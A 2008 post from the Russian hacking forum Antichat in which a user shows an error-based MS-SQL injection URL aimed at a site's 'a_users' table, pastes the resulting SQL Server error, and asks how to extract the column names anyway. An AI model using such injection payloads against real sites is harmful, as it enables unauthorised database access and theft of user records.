ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Получение колонок через MS-SQL injection.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Получение колонок через MS-SQL injection.
  #1  
Старый 06.10.2008, 00:19
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию Получение колонок через MS-SQL injection.
Всем здрасте!=)
При банальном запросе вида:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name='a_users')--
Получил ошибку, следующего содержания:
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables. 

/details.asp, line 59
Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ